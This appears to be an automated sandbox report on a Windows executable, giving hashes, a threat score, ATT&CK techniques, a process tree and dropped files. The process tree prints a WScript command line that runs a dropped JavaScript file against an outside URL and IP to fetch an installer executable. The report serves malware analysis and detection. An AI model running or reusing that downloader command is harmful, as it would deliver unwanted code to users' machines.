0d6a6a75e7d15b9ca17082dbfe2fa6a321bb9b08963928d7bf07155ac814ecb2

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
21-05-2024 20:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64bde517250cb578b11f339c51013ded_JaffaCakes118.exe
Size

184KB
MD5

64bde517250cb578b11f339c51013ded
SHA1

51090b7583df204306f12de1db735856ac2a23d7
SHA256

0d6a6a75e7d15b9ca17082dbfe2fa6a321bb9b08963928d7bf07155ac814ecb2
SHA512

16585e4565f419400ba7f1218e807115878507622f4ebff76fd5a1620e9352211d85c1d08780fb74e89ddfe545f9e6e7d64b539cedc98cf3db975d7d36e10fa3
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3S:/7BSH8zUB+nGESaaRvoB7FJNndnD

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	1804	WScript.exe
8	1804	WScript.exe
10	1804	WScript.exe
12	2772	WScript.exe
13	2772	WScript.exe
15	2884	WScript.exe
16	2884	WScript.exe
18	820	WScript.exe
19	820	WScript.exe
21	2064	WScript.exe
22	2064	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

64bde517250cb578b11f339c51013ded_JaffaCakes118.exe

description	pid	process	target process
PID 2980 wrote to memory of 1804	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 1804	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 1804	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 1804	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2772	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2772	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2772	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2772	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2884	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2884	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2884	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2884	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 820	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 820	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 820	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 820	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2064	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2064	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2064	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe
PID 2980 wrote to memory of 2064	2980	64bde517250cb578b11f339c51013ded_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\64bde517250cb578b11f339c51013ded_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\64bde517250cb578b11f339c51013ded_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2980

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf13B0.js" http://www.djapp.info/?domain=iLJksyMiJK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf13B0.exe
2⤵
- Blocklisted process makes network request
PID:1804

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf13B0.js" http://www.djapp.info/?domain=iLJksyMiJK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf13B0.exe
2⤵
- Blocklisted process makes network request
PID:2772

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf13B0.js" http://www.djapp.info/?domain=iLJksyMiJK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf13B0.exe
2⤵
- Blocklisted process makes network request
PID:2884

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf13B0.js" http://www.djapp.info/?domain=iLJksyMiJK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf13B0.exe
2⤵
- Blocklisted process makes network request
PID:820

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf13B0.js" http://www.djapp.info/?domain=iLJksyMiJK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf13B0.exe
2⤵
- Blocklisted process makes network request
PID:2064

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
a1d955617a4d146e70544d0d9a0390ca

SHA1
5ffdc4453b23e24a7cb0e634b26864c169f5257b

SHA256
8dbff2c0018158256912d87dd495a68c351303a319f50f204a930317e867aeb3

SHA512
0bffbc27638b12cc04f335de8c4f3c74df01ae55b56f389f8d046d797b4c62d31bbff057ea75ce32f67cdd3b878fd0aad3eb62e983f814296e1b94de3c6ba810

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
7a563beb0f36909289766932c4b9380d

SHA1
623915db94a0dca20dc9c7964d192d497509a8d0

SHA256
897739b53dddc346e418c2583667bd581fe294340670c223ae62d8a18a371a07

SHA512
8a929c7284a68dafccf37d808e1fb522277728f7a404067c86162a1bd5152582afd46a229337468b59d3169ad4617d9cb6b5c28c3a2fa58a6204b2ecdbb8157f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4da251a8231bb4473faccf4eb51f301f

SHA1
d8578fde869a9add04f608df346c14f014ba3a4f

SHA256
832c11493aaeaefa0cddf4fa442bc3163f416a9102061f3fed9f455a97fb0f45

SHA512
5b407f7db082503f2f47e0737d55120d570e96f8ee267ed1ee5c9dc17aad15c0c4d88b695202885b1392d941b3c6079f200bad2e8544b7001a036b892a969467

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
b0189009fda8bca3a80c8dd06262fb21

SHA1
9df3df76724028e800e3fa70a6ff70acb36c8401

SHA256
9a6b5860d272a173b0ccb4c70f14b0e528114ebfb4029828dc403674247d48aa

SHA512
f60739c5ec0cbdb302b9009f880eeb0b4e3f6e005926f752a1715fcd5327164843e9bf71326362cf8da34079ace529117399185307b4b6a907be2e0516c670d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm
Filesize
40KB

MD5
3ce8a03c948cefc80dec23f683a45edc

SHA1
757d0bc6ead0a89ab6f820359e5e82f067f61d53

SHA256
38743a5f5af0952431e9577c6d5b04a2dc8825d749a1fb270808a1fee0bf84a7

SHA512
60072c763a4e3b4dd1cbd2f313f813aacf39e8b9690e5039e33023b49d330fca068a5ee57f8788a740c3f933d7c7fd94eb3567cdcf7b15cf4b8ee4708df2bbda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm
Filesize
40KB

MD5
f2d5a37cd0c523d7bdc2c6751cbe081d

SHA1
1884a354b67bd0c13a55687746736a617c21ab5d

SHA256
4a727d7b5b247a25e79e81e5a69a5c517834529ddb6e4a8144075e38d4e1c13d

SHA512
b9734e5f867b90e4295a636debfdf7ebe3e671808b8336d2071bb7f54ad3ae8059380716da667041cb1b52b5c6e7a6a69fe9736d9a3303c12ed1e86bf1e5f811

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm
Filesize
40KB

MD5
32437aafdaf853f5c4ce0db1f1e1f18e

SHA1
edfd2eb0ad579ab5a27e699b283285fec9b1b02f

SHA256
b44ef1270b3b01e1b7022f152b1b7e2d7ef1624953d7a5af5f5f625c29fc0864

SHA512
4e375ad5d730d6ce2ad33ea74622da694be019e8b327c2c6dae3f6abb2770c3b8a2ebc74be2e610f21ac5ec00cbe95bade67e5a52abd4860ba4b4ba4a498a520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm
Filesize
40KB

MD5
6a249f85481dd8899e583eab4cadd21d

SHA1
82e32e8126f0f9bede475e4cc230ced6a2eb1921

SHA256
dcf6e2e9369aa5ab258b1106e4dbccdc2fb9ffea2014134ff2158b0d6b45403a

SHA512
11d91630454b945a1c600b1074b2fa86c37574ff289bdb3b194b76dc6a3c98f050d499825e715bac85ead4116f2399e6a7fa3a9ffdd192258c29a0191d93803f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm
Filesize
40KB

MD5
22c7e514e984b0c74d0fb52c96dc734d

SHA1
9c4fef7d699c7142b61ddc141a66fb8d4821994f

SHA256
7a1e9b38cdb981b6ee63761964da7dd690b015c1987b9ce2cfb0f5cfb1ed800c

SHA512
30ce127bbc09b5d031cc9d86d1d37337684c2876e864c2b92be840ea2b50bae75dafdc25f911c155933d273ea6aae50f338d1a88a1cb234e56ad7b476ec69ab1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab42CA.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5B4B.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf13B0.js
Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\80L62FJI.txt
Filesize
175B

MD5
77c7a37e7bbb9785d0d586a57ac955ef

SHA1
ad2dfe87a44bbd36aaeb5b888e2288b105a3a30b

SHA256
2a16513acd7275ec464672d043f6f38c25411f0c6dd09bb71ec00eb99779f634

SHA512
c85f57c28c8032a9f78922bc85c00b204a0f0d315d5be0fe06880ac8db8a4573793d4745127cc86b089cb875031d1aaa24c1cb108cec998eddcd97604dad9c43

Download Submit